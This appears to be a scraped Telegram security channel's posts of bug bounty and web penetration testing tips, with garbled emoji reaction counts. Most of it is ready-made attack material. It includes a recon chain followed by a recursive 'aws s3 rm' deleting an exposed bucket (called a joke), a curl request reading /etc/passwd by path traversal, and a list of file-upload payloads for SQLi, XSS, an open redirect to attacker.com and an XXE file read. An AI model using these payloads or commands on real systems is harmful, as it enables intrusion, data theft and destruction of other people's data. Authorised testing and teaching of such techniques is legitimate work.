π₯10π8
Some Web Application Penetration testing or Bug Bounty notes :)
Download link: https://mega.nz/file/Jv4UyRZL#6ZuyrmCzfgDcwiKggXBJVshCTPrNwLJ3C6DXg_cfBTE
Download link: https://mega.nz/file/Jv4UyRZL#6ZuyrmCzfgDcwiKggXBJVshCTPrNwLJ3C6DXg_cfBTE
mega.nz
30.4 KB file on MEGA
π9π₯4
echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon
aws s3 ls s3://REDACTEDCOM. s3. amazonaws. com
(If you still don't know the exact S3 Bucket you can use echo REDACTED.COM | cariddi -e -s -info)
aws s3 rm s3://REDACTEDCOM. s3. amazonaws. com --recursive
(It's joke, don't be a bad guy and report that...)
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯4π3
Keep checking my old Posts to continue your learning Process!
π9π₯3β€1
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Brut Security | Discussion
Community Discussion
π¨ π¨ π¨ Too many people miss critical vulnerabilities because they assume a GET request can't have a body! π¨ π¨ π¨
This is how you can send such a request using #curl :
This is how you can send such a request using #curl :
$ curl 'target:1234/download?filename=TEST' --data 'filename=../../../../../../../etc/passwd' -X GET
π9π₯4β€3π₯°1
π3π₯1
Now you can detect phishing websites quickly with Nucleiβ€
nuclei -l websites_Possible_Phishing -tags phishing -itags phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
β€3π₯3π1
SLQi
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal
../../etc/passwd/logo.png
../../../logo.png
XSS
-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1β¦"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
Open redirect
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
XXE β³
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
Please open Telegram to view this post
VIEW IN TELEGRAM
β€13π6π₯1